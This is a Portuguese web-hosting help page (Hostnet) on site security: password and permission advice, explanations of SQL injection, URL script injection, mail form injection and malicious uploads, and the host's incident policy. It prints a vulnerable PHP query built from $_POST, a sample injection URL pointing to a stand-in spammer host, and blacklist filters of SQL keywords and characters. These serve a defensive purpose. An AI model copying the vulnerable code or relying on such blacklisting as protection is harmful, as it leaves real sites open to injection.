Segurança para seu Site

Principais recomendações de segurança

• Altere periodicamente sua senha de acesso ao FTP.

• Caso não utilize FTP, recomendamos bloquear o acesso pelo Painel de Controle em: Conta → Alterar Senhas.

• Evite senhas fáceis, como datas de nascimento ou sequências simples (ex.: 123456, qwerty, 123123).

• Mantenha sempre seu sistema atualizado. Novas versões de softwares costumam corrigir falhas de segurança presentes em versões anteriores.

• Tenha cuidado com áreas de upload de arquivos no seu site, pois muitas invasões exploram falhas nesse tipo de funcionalidade.

• Restrinja os tipos de arquivos permitidos em uploads, permitindo apenas extensões necessárias (por exemplo: JPG e PNG).

• Utilize antivírus atualizado em seu computador pessoal.

• Instale e mantenha um firewall ativo em seu computador para evitar exploração de vulnerabilidades ou propagação de softwares maliciosos.

• Evite permissões 777 em arquivos e pastas. Utilize esse tipo de permissão apenas quando for realmente necessário.

Padrão de permissão em pastas e arquivos:

• Arquivos com permissão 644, que significa:

1. Permissão de leitura e gravação para o proprietário do arquivo.
2. Permissão de leitura para o grupo ao qual o proprietário do arquivo faz parte.
3. Permissão de leitura para todos os outros usuários.

• Pastas com permissão 755, que significa:

1. Permissão de leitura, gravação e execução para o proprietário da pasta.
2. Permissão de leitura e execução para o grupo ao qual o proprietário da pasta faz parte.
3. Permissão de leitura e execução para todos os outros usuários.

Os comandos abaixo executados por SSH corrigem as permissões:
Para colocar permissão 644 em todos os arquivos, use: find . -type f -exec chmod 644 ‘{}’ \;
Para colocar permissão 755 em todos as pastas, use: find . -type d -exec chmod 755 ‘{}’ \;

Site infectado ou identificado como perigoso pelo Google, o que devo fazer?

O Google oferece uma ferramenta de análise para esse tipo de ocorrência: Google Webmaster Tools

Indicamos que cadastre seu site nessa ferramenta para poder ter informações mais detalhadas, o vídeo abaixo explica como fazer isso.

Qual o antivírus usado nos servidor da Hostnet?

Para o serviço de e-mail utilizamos o Amavis, já para os servidores Web, trabalhamos com o Clamav.

Tipos de invasão:

SQL Injection:

SQL Injection é um ataque que consiste na inserção (conhecido como injeção) de uma query via aplicação web.
No “SQL Injection”, o invasor consegue através de brechas no site executar queries ou statements arbitrários numa base relacional via “injeção” de comandos em campos de formulários.

Para se proteger de ocorrências de SQL Injection, verifique se todo parâmetro passado para o seu site é tratado antes que seja concatenado na query.

Por exemplo, é muito comum erros como os que estão aí embaixo serem cometidos:

// PHP
$consulta = "DELETE FROM tabela WHERE id_tabela = " . $_POST[id];

Evite cometê-los. Em vez disso, trate primeiro o Request.Form(“id”) ou $_POST[id], como neste exemplo:

//PHP
if (is_numeric($_POST[id])) {
    $consulta = "DELETE FROM tabela WHERE id_tabela = " . $_POST[id];
} else {
   die("Dados inválidos");
}

Com a linguagem PHP, no lugar de simplesmente validar $id, valide:

$_GET[id]  -> se o "id" tiver que ser passado via GET
$_POST[id] -> se o "id" tiver que ser passado via POST

Para campos com strings, é aconselhável checar pelos caracteres:

  "  (aspas duplas)
  '  (aspas simples)
     (espaços)
  ;  (ponto e vírgula)
  =  (sinal de igual)
  <  (sinal de menor que)
  >  (sinal de maior que)
  !  (ponto de exclamação)
  -- (dois hifens, indica início de comentário em alguns bancos)
  #  (sustenido ou jogo-da-velha, indica início de comentário em alguns bancos)
  // (duas barras, indica início de comentário em alguns bancos)

Ou pelas palavras reservadas

 - SELECT       - INSERT
 - UPDATE       - DELETE
 - WHERE        - JOIN
 - LEFT         - INNER
 - NOT          - IN
 - LIKE         - TRUNCATE
 - DROP         - CREATE
 - ALTER        - DELIMITER

OBS: O trecho de código mencionado acima é apenas uma sugestão. Portanto, é aconselhável um tratamento mais incrementado para abordar todas as possíveis proteções.
Dicas úteis podem ser encontradas facilmente pela Internet ou podem ser obtidas com o seu desenvolvedor.

Script Injection

Explorando scripts que permitem a inserção de parâmetros na URL, o invasor pode, por exemplo, executar um script externo para envio de spam usando seu website. Neste caso, a URL ficaria com um formato similar a:

http://www.sitevulnerável.com.br/index.php?page=

http://sitedospammer.ru:q1w2e3r4@ftp.repositóriodearquivos.ru/lista.TXT

Nossa sugestão, neste caso, é que os scripts afetados filtrem a ocorrência de padrões como: “http://” nos parâmetros da URL, impedindo a chamada de scripts externos.

Mail Form Injection

A partir de formulários de contato do site, o invasor insere comandos SMTP nos campos (ou variáveis) que permitem enviar mensagens de spam.

Nossa sugestão, neste caso, é que os scripts afetados filtrem a ocorrência de padrões como: “CC:”, “Cc:”, “cc:”, “BCC:”, “Bcc:” e “bcc:”, impedindo seu uso para envio de spams.

Upload de Códigos Maliciosos

Esse é o tipo mais comum de invasão hoje em dia.

Usando formulários de upload sem autenticação de acesso, ou a partir de uma invasão de áreas vulneráveis do site, o spammer faz o upload de scripts maliciosos para alteração de arquivos, alteração do banco de dados ou envio de spam.

Nossa sugestão, neste caso, é manter o acesso a áreas de upload de arquivos protegido por senha. Além disso, é necessário manter softwares de terceiros, como lojas on-line e CMS, sempre atualizados e com vulnerabilidades corrigidas.

Invasão via FTP

Nesta situação, a senha é obtida por terceiros a partir de programas maliciosos instalados no computador do usuário. Estes programas, captam e enviam os dados de acesso ao FTP para terceiros que, posteriormente, os utilizam para publicação de scripts para envio de spam, propagação de vírus ou hospedagem de sites falsos.

Nossa sugestão, neste caso, é manter um bom software antivírus instalado e atualizado nos computadores que acessam o site via FTP. Além disso, evite acessar o site via FTP em computadores de uso comum, como os disponíveis em lanhouses e cybercafés.

Sistema de notificação sobre incidentes de segurança em nossos servidores

A Hostnet avisa quando detecta algo irregular no site?

Sim. Nosso departamento de Infraestrutura faz uma notificação ao cliente através do HelpDesk, informando os arquivos que foram identificados como maliciosos e solicitando seu retorno para identificarmos a natureza do arquivo encontrado. Esse retorno é aguardado por até 24 horas e, quando não ocorre, buscamos contato telefônico.

O site que contém arquivos maliciosos pode ser congelado?

A nossa ação visa resolver o incidente e evitar danos aos visitantes do site ou mesmo instabilidades no servidor. Logo, em primeiro lugar, removemos os arquivos infectados e em seguida notificamos o responsável pelo site. Em casos de reincidência ou falta de resposta ao nosso contato por mais de 48 horas, a conta é congelada e o cliente é notificado via HelpDesk.

Qual a posição da Hostnet diante desses incidentes?

Não existe interesse por parte da Hostnet em retirar do ar os sites hospedados conosco, muito pelo contrário. Por isso, oferecemos ajuda e orientações para que o seu site obtenha as correções de segurança necessárias e o problema seja solucionado. Dessa forma, evita-se que os problemas adquiram proporções maiores, como a punição do site no Google ou o bloqueio dos endereços IP da Hostnet.

Um único site infectado, se não tratado imediatamente, pode acarretar o bloqueio de toda a nossa faixa de endereços IP e prejudicar todos os domínios hospedados sob estes endereços.

Por exemplo, imagine se serviços de banda larga como o Velox (Oi), o Speedy (Vivo) ou o Virtua (Net) bloqueiam o acesso à nossa faixa de endereços IP. Clientes que usam uma destas conexões ficariam totalmente sem acesso aos nossos serviços; os visitantes não conseguiriam abrir os sites para navegar; os proprietários e seus webmasters não conseguiriam conectar via FTP para atualizar e corrigir os problemas. Ou seja, seria um grande impacto.

Além disso, algo que pode acontecer é o site ser identificado como contaminado com vírus pelos buscadores, e sofrer punições, como o acesso tornar-se restrito.. Isso prejudica a imagem do site e seu posicionamento nas buscas.

Hackers também usam diversos artifícios para manipular sites de terceiros e usá-los para aplicar golpes em bancos, e uma infinidade de outras naturezas mal intencionadas que não condizem com o interesse do dono do site.

É por esta razão que a identificação de arquivos maliciosos requer uma ação imediata por parte da Hostnet, que zela pela integridade dos servidores, pela orientação ao proprietário do site e pelos usuários que navegam nos sites aqui hospedados.

Sites para verificar se um site está contaminado ( vírus ):

https://sitecheck.sucuri.net
http://www.urlvoid.com/